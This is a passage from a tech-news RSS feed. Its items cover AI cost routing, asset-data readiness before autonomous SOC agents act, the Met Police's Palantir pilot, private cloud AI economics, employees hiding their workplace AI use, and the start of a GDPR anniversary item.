</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Built a Routing Layer to Cut Our AI Costs. It Broke the Product.]]></title>
<description><![CDATA[A team cut their AI inference bill by more than half. Three months later, customer satisfaction was dropping and the cost savings were tied to the quality loss. Cost-optimization routing layers are a Pareto trap, and here's the detection methodology that catches them in days instead of months.
Th...]]></description>
<link>https://tsecurity.de/de/3629785/ai-nachrichten/we-built-a-routing-layer-to-cut-our-ai-costs-it-broke-the-product/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629785/ai-nachrichten/we-built-a-routing-layer-to-cut-our-ai-costs-it-broke-the-product/</guid>
<pubDate>Sat, 27 Jun 2026 17:19:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A team cut their AI inference bill by more than half. Three months later, customer satisfaction was dropping and the cost savings were tied to the quality loss. Cost-optimization routing layers are a Pareto trap, and here's the detection methodology that catches them in days instead of months.</p>
<p>The post <a href="https://towardsdatascience.com/we-built-a-routing-layer-to-cut-our-ai-costs-it-broke-the-product/">We Built a Routing Layer to Cut Our AI Costs. It Broke the Product.</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonomous security agents need complete data. Here's how to check if yours is ready.]]></title>
<description><![CDATA[An endpoint agent cannot report its own absence. The 2026 Axonius Actionability Report, conducted with the Ponemon Institute and surveying 662 IT and security professionals, put a number on a gap SOC teams have worked around for years. Across the Axonius customer base, 12.7% of devices in a 298,0...]]></description>
<link>https://tsecurity.de/de/3628252/it-nachrichten/autonomous-security-agents-need-complete-data-heres-how-to-check-if-yours-is-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628252/it-nachrichten/autonomous-security-agents-need-complete-data-heres-how-to-check-if-yours-is-ready/</guid>
<pubDate>Fri, 26 Jun 2026 20:03:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An endpoint agent cannot report its own absence. The <a href="https://www.axonius.com/resources/analyst-report/the-actionability-report-axonius-ponemon-institute">2026 Axonius Actionability Report</a>, conducted with the <a href="https://www.ponemon.org/">Ponemon Institute</a> and surveying 662 IT and security professionals, put a number on a gap SOC teams have worked around for years. <a href="https://www.axonius.com/blog/rsac-2026-recap">Across the Axonius customer base</a>, 12.7% of devices in a 298,000-device median inventory are missing their expected security agent.</p><p>If a device has no agent, no management console shows it. If a CMDB record is stale, no reconciliation flags it. An employee who installed Claude Enterprise outside procurement created a SaaS workspace, identity surface, and API-token footprint that endpoint telemetry alone will not reliably inventory. The coverage percentage on the EDR dashboard is structurally incomplete because the reporting mechanism cannot see what it does not cover.</p><p>That gap matters more now than it did six months ago. SOC and XDR vendors are pushing more autonomous investigation and remediation into production. Those agents will query the same dashboards, trust the same coverage percentages, and act on the same blind spots human analysts learned to work around. A human analyst second-guesses a 98% coverage number. An autonomous agent treats it as ground truth and moves at machine speed.</p><h2>Three independent signals converged on the same gap</h2><p><a href="https://www.gravitee.io/blog/88-of-companies-have-already-seen-ai-agent-security-failures">Gravitee’s 2026 survey</a> of 900-plus executives found 88% reported confirmed or suspected AI-related incidents, and only 14.4% sent agents live with full security approval. The Axonius/Ponemon report found 52% of respondents would let autonomous agents act on recommendations — while 63% said the underlying data lacks important information. <a href="https://cloudsecurityalliance.org/blog/2026/02/02/the-agentic-trust-framework-zero-trust-governance-for-ai-agents">The CSA's Agentic Trust Framework</a> requires verified data governance before agents act on any finding.</p><p>Mike Riemer, Field CISO at <a href="https://www.ivanti.com/">Ivanti</a>, said that known vulnerabilities on Azure’s honeypot networks are now attacked in under 90 seconds. “Traditional security measures continue to work,” Riemer told VentureBeat. </p><p>The caveat is that those measures only protect what they can see. An EDR agent deployed across 87.3% of the device inventory leaves the remaining 12.7% outside that agent’s telemetry, policy enforcement, and detection logic.</p><h2>Exclusive deployment data quantifies the scale</h2><p>Joe Diamond, CEO of Axonius, told VentureBeat that the average CISO sees roughly 50% of what is actually on the network. “Say 50% of their environment is sitting in dark matter,” Diamond said. “They don’t know what it is, or where it is, or who has access to it, if it’s secure, if it’s not secure.”</p><p>Deployment data from more than 900 Axonius customers confirms those numbers. TransUnion went from 70% to 99% endpoint coverage after out-of-band verification. <a href="https://www.axonius.com/newsroom/press-release/western-union-drives-reduction-in-manual-security-workload-improve-asset-coverage-with-axonius">Western Union went from 85% to 99%</a> by consolidating data from 38 tools and cutting manual workload by half. Lumen discovered 1.1 million assets, where the CMDB showed 17,000. That translates to roughly 37,000 unmanaged endpoints per organization sitting outside every policy, every patch cycle, and every detection rule.</p><p>Diamond pointed to <a href="https://www.anthropic.com/claude/mythos">Mythos</a>, Anthropic’s frontier reasoning model, as a sign that machine-speed offensive capability will make any unknown asset far riskier than it is today. “People tend to have shiny object syndrome,” he said. “If you didn’t understand what 50% of your environment looked like from a traditional endpoint perspective, and you think you’re going to wind sprint to granular control and governance of AI, your program will fail.” Diamond called the broader AI shift “as big, if not bigger than the internet.”</p><h2>Three approaches compete to close the gap</h2><p>No single architecture solves the visibility problem today. Three approaches compete, each with named tradeoffs security teams should evaluate before procurement.</p><p><b>A dedicated integration layer </b>uses bidirectional API adapters to build an always-current inventory. Axonius runs 1,400-plus adapters and now discovers shadow Claude Enterprise installations via its Anthropic adapter (GA June 15). “We created a bidirectional API integration with all the IT systems and all the security controls to build an always up-to-date inventory of what the environment looks like,” Diamond told VentureBeat.</p><p><b>Platform-native EDR and XDR intelligence </b>builds richer asset context inside the agent footprint. Depth within the agent footprint is the advantage. The limitation is structural. Platform-native intelligence is bounded by what the agent can see, and the gap the Ponemon report identified lives precisely where that visibility ends.</p><p><b>CMDB modernization </b>requires continuous reconciliation against three or more independent telemetry sources. Only 13% of organizations reconcile daily, according to <a href="https://www.axonius.com/blog/2026-axonius-actionability-report-context">Axonius/Ponemon data</a>. The remaining 87% operate on stale records that feed incorrect prioritization into any automated remediation pipeline.</p><h2>EDR data readiness: Five gates before autonomous remediation</h2><p>Before you let autonomous SOC agents close tickets or quarantine assets, this checklist tells you whether your EDR and asset data is solid enough to trust. It is vendor-agnostic, works with any EDR and CMDB, and gives you five pass/fail gates you can run in a single working session.</p><table><tbody><tr><td><p><b>Risk Area</b></p></td><td><p><b>What the data shows</b></p></td><td><p><b>Readiness threshold</b></p></td><td><p><b>Action to take now</b></p></td></tr><tr><td><p>Asset inventory delta</p></td><td><p>Ponemon: only 45% consolidate into a single view. Forrester TEI: 150% more assets than previously identified. Lumen: 17K in CMDB vs. 1.1M discovered.</p></td><td><p><b>Delta ≤10%</b> between discovery, CMDB, and EDR agent count. Delta above 10% blocks automated remediation until reconciled.</p></td><td><p>Run API-based discovery against all segments. Diff against CMDB and EDR console count. Reconcile quarterly minimum.</p></td></tr><tr><td><p>Unmanaged AI services</p></td><td><p>Gravitee: 88% confirmed or suspected AI incidents. Only 14.4% with full security approval. Anthropic adapter (GA June 15) discovers unmanaged Claude Enterprise installations.</p></td><td><p>No high-risk AI services outside approved procurement. <b>Weekly SaaS discovery scans.</b> Unmanaged high-risk instances trigger IR triage before exception review.</p></td><td><p>Deploy SaaS discovery or protocol-level adapters for AI service detection. Automate weekly scans. Route unmanaged instances to IR queue.</p></td></tr><tr><td><p>CMDB record accuracy</p></td><td><p>Ponemon: only 13% reconcile daily (RSAC 2026). Brooks Running: 20% server discrepancy between console and independent discovery. Top remediation barriers: unclear prioritization, unclear ownership, inconsistent data.</p></td><td><p><b>≥85% of records</b> validated against 3+ independent telemetry sources. No stale or orphaned records in active remediation queue.</p></td><td><p>Cross-reference CMDB against cloud inventory, EDR telemetry, and IdP directory. Continuous reconciliation replaces annual audit cycles.</p></td></tr><tr><td><p>Endpoint agent coverage gap</p></td><td><p>Ponemon: an agent cannot report its own absence (p. 8). TransUnion: 70% to 99% after out-of-band verification. RSAC 2026: 12.7% of 298K median devices missing expected agent.</p></td><td><p><b>≥95% agent coverage</b> verified via out-of-band discovery. Many CISOs set this as the minimum before allowing autonomous remediation. No self-reported-only metrics in board reports.</p></td><td><p>Run network-based or API-driven discovery against managed device list. Coverage below 95% blocks automated remediation scoping.</p></td></tr><tr><td><p>Asset ownership mapping</p></td><td><p>Ponemon: 32% apply tags consistently. Only 51% assign ownership on new exposures (pp. 9, 16). TransUnion: 12K to 190K assets with ownership mapped.</p></td><td><p><b>Owner assigned within 24 hours.</b> Tags consistent across cloud, EDR, CMDB. Three systems showing three owners = failure.</p></td><td><p>Automate ownership via cloud tags, IdP group membership, or CMDB metadata. Map asset, remediation, and business owner as separate fields.</p></td></tr></tbody></table><h2>Five questions to ask before allowing autonomous SOC action</h2><ol><li><p>What independently verifies endpoint-agent coverage outside the EDR console?</p></li><li><p>How does the SOC reconcile conflicts between EDR, CMDB, cloud inventory, IdP, and discovery tools?</p></li><li><p>Can AI agents act on assets with unknown or disputed ownership?</p></li><li><p>Can the system distinguish “not vulnerable” from “not visible”?</p></li><li><p>What data-quality gate blocks autonomous remediation when coverage or ownership falls below threshold?</p></li></ol><h2>Board-ready risk framing</h2><p>Kayne McGladrey, IEEE Senior Member, has confirmed the pattern across multiple published VentureBeat interviews. The structural gap in self-reported coverage is not new. What is new is that autonomous agents will act on it at machine speed without the institutional workarounds human analysts developed over years of experience. Diamond put the board-level stakes plainly in an <a href="https://www.axonius.com/newsroom/press-release/axonius-delivers-ai-powered-remediation">April 2026 press statement</a>: “Findings pile up because the data isn’t trusted, ownership isn’t clear, and entire asset classes aren’t even in the picture.”</p><p>The <a href="https://cloudsecurityalliance.org/blog/2026/02/02/the-agentic-trust-framework-zero-trust-governance-for-ai-agents">CSA’s Agentic Trust Framework</a> requires that any agent promoted to a higher autonomy level must pass five gates, including demonstrated accuracy and a security audit. The EU AI Act’s Article 50 transparency obligations take effect August 2, 2026. The May 2026 Digital Omnibus pushed high-risk system obligations to December 2027, but organizations deploying agentic SOC agents on incomplete asset data face immediate operational risk that outpaces any regulatory timeline.</p><p>The board-ready sentence: Our EDR coverage reports are structurally incomplete because an endpoint agent cannot report its own absence, and we are verifying coverage through out-of-band discovery before deploying autonomous agents that would act on those reports at machine speed.</p><h2>Security director playbook</h2><ol><li><p><b>Run out-of-band asset discovery this week. </b>Compare results against your CMDB export and EDR console count. If the delta exceeds 10%, halt automated remediation scoping until the gap is reconciled.</p></li><li><p><b>Deploy SaaS discovery for AI services. </b>Employees install AI ahead of procurement, ahead of security. Weekly scans are the minimum. Route any unmanaged high-risk instance to your incident response queue for triage before exception review.</p></li><li><p><b>Map asset ownership to remediation responsibility. </b>Ponemon found only 32% of organizations apply tags consistently. If three systems show three different owners for the same asset, automated remediation has no routing target. Fix the ownership layer before deploying agents that depend on it.</p></li><li><p><b>Kill self-reported-only coverage metrics. </b>Any risk calculation or board report that relies on EDR console-reported coverage alone is built on data the reporting system cannot verify. Require out-of-band verification for every coverage number that informs a risk decision.</p></li></ol><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Met Palantir pilot: The DPIA that raises more questions than answers]]></title>
<description><![CDATA[We examine the Data Protection Impact Assessment for the Metropolitan Police’s Palantir Foundry pilot, and the governance gaps it exposes around surveillance, transparency and staff consultation]]></description>
<link>https://tsecurity.de/de/3627478/it-nachrichten/met-palantir-pilot-the-dpia-that-raises-more-questions-than-answers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627478/it-nachrichten/met-palantir-pilot-the-dpia-that-raises-more-questions-than-answers/</guid>
<pubDate>Fri, 26 Jun 2026 15:02:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We examine the Data Protection Impact Assessment for the Metropolitan Police’s Palantir Foundry pilot, and the governance gaps it exposes around surveillance, transparency and staff consultation]]></content:encoded>
</item>
<item>
<title><![CDATA[Why private AI is the smarter bet]]></title>
<description><![CDATA[For the past several years, the default assumption in enterprise IT was that AI would follow the same path as many other workloads and settle into the public cloud. That assumption seemed reasonable on the surface. The hyperscalers had the infrastructure, GPU capacity, managed services, and devel...]]></description>
<link>https://tsecurity.de/de/3626875/ai-nachrichten/why-private-ai-is-the-smarter-bet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626875/ai-nachrichten/why-private-ai-is-the-smarter-bet/</guid>
<pubDate>Fri, 26 Jun 2026 11:18:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the past several years, the default assumption in enterprise IT was that AI would follow the same path as many other workloads and settle into the public cloud. That assumption seemed reasonable on the surface. The hyperscalers had the infrastructure, <a href="https://www.networkworld.com/article/3966130/what-are-gpus-inside-the-processing-power-behind-ai.html">GPU capacity</a>, managed services, and developer ecosystems. If you wanted to move fast, public cloud AI looked like the obvious answer.</p>



<p>That logic is now being challenged by reality. <a href="https://news.broadcom.com/releases/broadcom-private-cloud-outlook-2026">As enterprises move from AI experiments to AI in production</a>, they increasingly find that the public cloud is a convenient place to start but not the most practical place to stay. Enterprises are wondering if they can afford to base their long-term AI strategies on cost models they do not control, risks they cannot fully contain, and architectures that are optimized for provider scale rather than enterprise economics.</p>



<p>This is why private cloud AI is becoming more popular. Enterprises are not moving on-premises because it’s a fashionable choice. They are moving because, in many cases, it is the financially rational choice.</p>



<h2 class="wp-block-heading">The expense of token-based AI</h2>



<p>The market still treats token-based AI pricing as a stable, mature economic model. It is not. Much of what enterprises pay today reflects a highly competitive environment in which providers are still subsidizing adoption, offering aggressive discounts, and prioritizing market share over normalized margins. That may be good news in the short term, but it is dangerous to assume those conditions will persist.</p>



<p>As enterprises scale their usage, token consumption shifts from an interesting line item to serious financial exposure. A chatbot pilot is one thing. Enterprisewide inference across business operations, customer engagement, knowledge systems, automation, analytics, and embedded software is something else entirely. When AI becomes part of the daily operating fabric of the business, token charges stop being experimental expenses and become recurring utility bills. At that point, even modest changes in pricing can have major budget consequences.</p>



<p>Many tech leaders are now rethinking their assumptions about AI costs, realizing that current pricing may not reflect long-term expenses. As subsidies fade and usage increases, token costs are likely to rise sharply, potentially making large-scale public AI deployments less economically viable. That is the trap enterprises want to avoid. No CIO wants to explain that the company successfully operationalized AI only to discover that a growing bill from a public provider offsets every business gain. Enterprises have seen this before with cloud cost overruns, and they do not want to repeat it with AI.</p>



<h2 class="wp-block-heading">Hybrid AI is the natural end state</h2>



<p>It is becoming clear that the future of enterprise AI is neither all public cloud nor all on-premises. It is a hybrid. The market is maturing beyond ideology and moving toward workload placement based on economics, governance, latency, and control.</p>



<p>That shift matters because not every AI problem requires a giant hosted model. In fact, many enterprise use cases do not. A growing number of organizations are finding that smaller, domain-specific models can perform as well as, and often better than, larger ones for targeted business tasks. Some use tuned models. Some rely on classic machine learning and <a href="https://www.cio.com/article/228901/what-is-predictive-analytics-transforming-data-into-future-insights.html">predictive systems</a>. Some combine <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval techniques</a> with smaller language models. Others build tightly constrained models tailored to specific operational domains.</p>



<p>These systems are often better suited to private infrastructure. They run closer to enterprise data, can be optimized for predictable workloads, and avoid the open-ended cost profile of external tokenized services. This is especially true when the model is used repeatedly within internal business processes rather than occasionally by a limited set of users. In other words, enterprises are not just choosing private AI because they dislike public cloud pricing. They are choosing it because they are learning to build AI systems that meet enterprise requirements rather than defaulting to whatever is easiest to consume from the outside.</p>



<h2 class="wp-block-heading">Security and governance </h2>



<p>Cost may be the loudest concern, but it is not the only one. Security and governance are becoming equally powerful drivers. Enterprises are increasingly uncomfortable with the idea of sensitive information flowing through public AI tools, public APIs, and user workflows that are difficult to monitor and control. The concern is not abstract. Employees routinely paste confidential information into public AI interfaces to boost productivity. Development teams sometimes move faster than policy can keep pace. Business units adopt tools before governance can catch up. The result is a growing risk of data leakage, unauthorized exposure, compliance failures, and security incidents directly tied to the use of AI.</p>



<p>This changes the conversation. Once AI touches customer records, financial models, regulated data, or other proprietary information, the focus shifts from deployment speed to the risk you introduce to the core of the business. While public clouds can provide strong security, many enterprises prefer tighter internal controls for sensitive AI workloads to ensure better observability, access, data locality, and policy enforcement.</p>



<p>There’s no question that private AI reduces the number of unknowns. It gives enterprises more direct control over where data resides, how models are used, who can access them, and how systems are audited. That does not eliminate risk, but it makes risk easier to manage.</p>



<h2 class="wp-block-heading">Private AI is harder but worth it</h2>



<p>Private AI is not effortless. Building AI on premises or in a <a href="https://www.infoworld.com/article/2291750/what-the-private-cloud-really-means.html">private cloud</a> requires investment, planning, specialized skills, operational discipline, and a willingness to own more of the stack. Enterprises must think about infrastructure design, GPU utilization, life-cycle management, model operations, integration, and resilience in ways that public services often abstract away.</p>



<p>That extra work introduces real risk. Some organizations will underestimate the operational burden, some will overspend on infrastructure, and some will struggle to attract the right talent. Even with those challenges, many enterprises are concluding that the cost savings are too compelling to ignore.</p>



<p>Enterprises are not moving toward private AI because it is easier. They are moving because it’s smarter in the long term. They would rather take on more responsibility now than remain exposed to a pricing model that could become unsustainable later. They would rather invest in owned capability than rent critical intelligence from an outside platform with uncertain future economics.</p>



<p>The public cloud will remain important, especially for experimentation, bursting, and select services. But for many production workloads, the balance is shifting. As token costs rise, governance pressures intensify, and organizations become better at building focused models rather than defaulting to giant LLMs, more enterprises will conclude that their most valuable AI belongs closer to home.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The dark side of AI success: What your employees know that the board doesn’t]]></title>
<description><![CDATA[A recent article on CIO.com made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI activity to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has a...]]></description>
<link>https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</guid>
<pubDate>Fri, 26 Jun 2026 11:06:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A <a href="https://www.cio.com/article/4161509/ai-hype-to-ai-value-escaping-the-activity-trap.html">recent article on CIO.com</a> made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI <em>activity</em> to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has actually moved the business. Outcomes were never defined before the projects began, so success cannot honestly be measured after the fact. The board hears momentum. The CFO sees cost. And nobody can clearly answer what actually changed because of AI.</p>



<p>It is a well-observed problem. But it only tells half the story.</p>



<p>The other half is happening desk by desk, in organizations everywhere. While executives debate ROI frameworks, a parallel economy of AI productivity is running quietly in the background — driven by employees who have figured out how to use these tools and have calculated, quite rationally, that the safest thing to do is say nothing about it.</p>



<p>Understanding what is driving that silence is not a secondary concern. It is arguably the most important AI management challenge most organizations have not yet named.</p>



<h2 class="wp-block-heading">The job security calculation no one talks about</h2>



<p>The most important driver of AI silence is also the most understandable.</p>



<p>Consider an employee who has quietly been using an AI tool to draft client reports. A task that once took four hours now takes 45 minutes. The output is better: Tighter, better structured, more thoroughly referenced. Her manager is pleased. Her clients are happier. And she has said absolutely nothing to anyone about how she is doing it.</p>



<p>When employees find themselves in this situation, the reasoning for staying silent is almost always the same: If I tell them I can do it in 45 minutes, they’ll wonder what I’m doing with the rest of my time. Or they’ll give me more work. Or they’ll decide they don’t need as many of us.</p>



<p>This is not paranoia. The <a href="https://fortune.com/2026/03/25/workers-anxious-scared-insecure-ai-adp-global-survey/" rel="nofollow">ADP Research Today at Work 2026 report</a> — which surveyed more than 39,000 workers across 36 markets — found that only 22% of global workers strongly agreed their job was safe from elimination, even against a backdrop of historically low unemployment. The culprit identified by the report is AI anxiety, gripping workforces regardless of seniority or sector.</p>



<p>The scale of that anxiety has a structural basis. The World Economic Forum’s Future of Jobs Report 2025 (weforum.org) found that while 77% of employers plan to upskill staff to work alongside AI, 41% simultaneously plan to reduce their workforce as AI automates certain tasks. Employees are reading those numbers carefully, even when their employers are not.</p>



<p><a href="https://fortune.com/2025/05/29/employees-secretly-using-ai-hiding-bosses-secret-advantage-peers/" rel="nofollow">Research from Ivanti</a> puts the scale of the resulting silence in sharp relief: Nearly one-third of workers keep their AI use secret from their employer, with 30% specifically citing fear that their job will be cut if they disclose it, and a further 36% staying silent because they enjoy the competitive edge AI gives them over peers. The employee who is most proficient with AI — and therefore delivering the greatest productivity uplift — has the most to lose by saying so. So, they say nothing, the gain disappears invisibly into expanded workload, and it never surfaces in any report to the board.</p>



<p>For organizations trying to understand the true impact of AI on their operations, this is a foundational measurement problem. The biggest wins may be the ones most deliberately hidden.</p>



<h2 class="wp-block-heading">What’s actually happening beneath the surface</h2>



<p>The job security calculation is the most significant driver of AI silence, but it is not the only one. At least four other dynamics are keeping the real story from reaching leadership:</p>



<ol class="wp-block-list">
<li><strong>Competitive concealment</strong>, which the Ivanti data captures well. Not every employee who hides AI use is afraid of their employer — some are protecting an edge over colleagues. In performance-ranked environments — sales floors, bid teams, content departments — knowing how to use AI effectively is increasingly the difference between hitting targets and missing them. People who have that edge are not always eager to share it.</li>



<li>What the data describes as <strong>complacent and non-transparent use</strong>. A <a href="https://www.techtimes.com/articles/310167/20250429/workers-are-hiding-their-ai-usestudy-reveals-why-thats-big-problem-employers.htm" rel="nofollow">KPMG global study of more than 48,000 workers across 47 countries</a> found that 58% of employees are intentionally using AI at work, yet the study identified widespread non-transparency in <em>how</em> it is being used — with many not checking the accuracy of AI outputs or disclosing usage to managers. Nicole Gillespie, co-author of the report and a professor at the University of Melbourne, described the findings as a troubling level of “inappropriate, complex and non-transparent” AI use. Her prescription: Organizations must create transparent, shared learning environments where employees feel safe to experiment with AI without fear.</li>



<li>The third is something harder to name: A kind of <strong>impostor anxiety</strong>. The same Ivanti research found that 27% of employees who use AI at work experience impostor syndrome as a result — they feel that the quality of their AI-assisted work is better than what they could produce alone, and that this gap is somehow dishonest. These tend to be the most thoughtful and quality-conscious adopters in the organization, and they are actively obscuring the AI contribution to their work rather than risk being seen as relying on a crutch.</li>



<li><strong>The shadow infrastructure problem.</strong> A Laserfiche-commissioned survey published in Security Magazine (securitymagazine.com, August 2025) found that 49% of American employees hide their AI tool use from their employer, with only 36% reporting clear AI guidelines and an approved tools list in their workplace — and one in ten describing their organization’s AI environment as “the Wild West.”</li>
</ol>



<p>The data security implications run deeper still. The KPMG global study found that 46% of US employees have uploaded sensitive company data into public AI tools, often without knowing whether the content was confidential. That is not malicious intent — it is the predictable result of a governance vacuum — but it represents a risk exposure that leadership is largely unaware of.</p>



<h2 class="wp-block-heading">What leaders should actually do about this</h2>



<p>These four dynamics — fear of redundancy, competitive concealment, impostor anxiety and shadow infrastructure — combine to produce a fifth and arguably most damaging outcome: The “do more with less” spiral.</p>



<p>When employees quietly use AI to work faster, organizations rarely recognize the efficiency gain and redistribute the capacity thoughtfully. They simply load those employees with more work. The report that used to take four hours now takes 45 minutes, so more reports get assigned. The workload expands to absorb the freed capacity. The employee cannot now reveal the AI assistance without exposing how much time they have been quietly banking. And so, the spiral continues: More output, more concealment and no organizational learning captured.</p>



<p>The CIO.com article’s central argument — that organizations must define outcomes before embarking on AI projects — is correct. But the hidden dynamics described above suggest the measurement problem runs deeper than an absence of pre-defined success criteria. You cannot define meaningful outcomes if the people generating the most significant AI-driven results are structurally incentivized not to tell you about them.</p>



<p>Closing that gap requires organizations to make three interconnected shifts — each designed to tie AI’s business outcomes directly to the employees doing the work and to create the conditions in which those employees are willing to share what they know.</p>



<h3 class="wp-block-heading">Step 1: Make the commitment explicit — and tie it to outcomes from the start</h3>



<p>The first step is to make an unambiguous public commitment that AI productivity gains will not be used as the basis for headcount decisions. But a commitment alone is not enough — it only holds weight when it is paired with something concrete employees can see: Business outcomes defined before the project begins, not after.</p>



<p>Not “AI will make us more efficient” — which means nothing and measures nothing — but observable, agreed results: Client proposal turnaround reduced from five days to two; compliance review time cut by 40%; customer query resolution improved by a defined margin within a defined period. A CIO.com analysis of AI metrics found that the most effective organizations evaluate success across three dimensions: Return on employees (output per hour, backlog reduction), return on investment (labor cost per worker, conversion rates) and return on future (market share signals, new capability unlocked). None of those measures require employees to justify their existence. All of them create a shared definition of what winning looks like.</p>



<p>When business outcomes are defined upfront, the dynamic shifts. Employees can see that the measure of AI’s success is the outcome — not their hours logged or headcount consumed. Leadership has something meaningful to report to the board beyond adoption figures. And the question changes from “how many people are using AI?” to “what did AI change about this result?” — a question employees can answer honestly, because the answer no longer puts their role at risk.</p>



<h3 class="wp-block-heading">Step 2: Build incentives strong enough to override the fear</h3>



<p>This is the step most organizations skip entirely — and it is the most important one. A commitment not to cut jobs and a clear outcome framework create the conditions for honesty. But it does not actively reward it. For employees who have spent months quietly banking efficiency gains, the rational calculation remains: Why surface what I have if there is nothing in it for me?</p>



<p>The answer from the organizations doing this well is: Make sharing genuinely worth it. Not as a vague cultural aspiration, but as a structured, visible program with real rewards attached.</p>



<p>Wharton senior fellow Scott Snyder has proposed treating employee time as capital: If an individual identifies an AI method that saves four hours a week, they receive a portion of that saved time — perhaps 50 hours a year — to invest in further AI experimentation or professional development. This creates a direct incentive to disclose efficiency gains rather than conceal them, and it transforms the calculation from “what do I lose by sharing?” to “what do I gain?”</p>



<p>Real-world examples are already emerging. Law firm Shoosmiths created a £1 million bonus fund tied to Microsoft Copilot usage, with 1,300 employees eligible to receive approximately £770 each if the firm reached one million Copilot uses in its fiscal year. IBM awards “BluePoints” to winners of its annual AI innovation contest, redeemable for electronics, appliances or event tickets. Pharma firm Sanofi uses a points system to reward employees who experiment with AI and share what they learn. As Sanofi’s head of culture put it: “Recognition is the fuel of trust, and trust is what makes AI adoption possible and scalable.”</p>



<p>McKinsey’s 2025 workplace AI research confirms that 40% of employees say incentives and financial rewards would increase their daily use of AI — ranking it fourth among the factors that would most improve adoption, behind training, workflow integration and tool access. EY’s Work Reimagined survey goes further, finding that organizations that formally align rewards with AI behaviors and outcomes are significantly more likely to achieve transformational results, while those that deploy AI onto “fragile talent foundations — weak culture, insufficient learning, misaligned rewards” see productivity benefits lag by over 40%.</p>



<p>The principle behind all of these approaches is the same: Employees will share the benefits of AI when sharing the benefits of AI is rewarded — concretely, consistently and visibly. Until that condition is met, the most productive employees in the organization will remain the quietest.</p>



<h3 class="wp-block-heading">Step 3: Rebuild the board update around outcomes and employee voice</h3>



<p>Third, demand more from the board update. <a href="https://www.grantthornton.com/services/advisory-services/artificial-intelligence/2026-ai-impact-survey" rel="nofollow">Grant Thornton’s 2026 AI Impact Survey</a> found that organizations with fully integrated AI are nearly four times more likely to report revenue growth than those still piloting. The difference is not primarily technological — it is governance and accountability. The leading organizations can demonstrate how their AI makes decisions, who owns the outcomes and what happens when something goes wrong. That level of transparency can only exist when both leadership and employees are operating in the open.</p>



<p>A board update built around outcomes looks fundamentally different from one built around activity. It does not lead with “We have deployed AI across fourteen workflows.” It leads with “Here is what changed in the business because of AI, here is how we measured it and here is what our employees told us about working with it.”</p>



<p>That last element — what employees said — is not a soft add-on. A CIO.com piece on AI adoption published in 2025 put it plainly: “Trust is the invisible infrastructure of AI adoption. It’s built through transparency about intent, honest conversations about job impact, visible upskilling opportunities and letting employees see their peers genuinely benefit.” Employee willingness to use AI, and to share its benefits openly is the most reliable leading indicator of whether an AI program is building genuine organizational capability or simply burning through budget on tools that will be quietly worked around.</p>



<p>Organizations that track this systematically ask three questions on a regular basis: Is AI use growing organically, or only where it is mandated? Are employees who use AI more likely to flag further opportunities, or do they stay quiet? And when AI delivers a measurable outcome, does the team responsible feel able to claim it?</p>



<p>If the answers are “mostly mandated,” “they stay quiet” and “not really” — the organization has a trust and incentive problem that no amount of AI investment will solve. The technology is not the constraint. The environment is.</p>



<p>The board update on AI should not just report how many licenses are deployed and how many pilots are underway. It should grapple with harder questions: What are employees actually using AI for today, including tools we did not procure? What outcomes has that usage produced and how do we know? What would it take to make it safe — and genuinely worthwhile — for them to tell us?</p>



<p>Until those questions are asked — and until the answers can be given without fear and with something to gain — the most important AI story in the building will continue to be told in silence. The board will keep hearing about activity. The CFO will keep questioning ROI. And the employee who cracked the code months ago will keep her head down, produce excellent work and say nothing.</p>



<p>That is the measurement problem the CIO.com article did not quite reach. And it is the one that matters most.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GDPR at 10: Landmark data protections, increasing business burden]]></title>
<description><![CDATA[Ten years have passed since the General Data Protection Regulation (GDPR) came into force, and the results are mixed. While data protection has become more firmly established in European companies — and beyond — than ever before, the business world remains critical of the regulation due to increa...]]></description>
<link>https://tsecurity.de/de/3626658/it-security-nachrichten/gdpr-at-10-landmark-data-protections-increasing-business-burden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626658/it-security-nachrichten/gdpr-at-10-landmark-data-protections-increasing-business-burden/</guid>
<pubDate>Fri, 26 Jun 2026 09:53:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
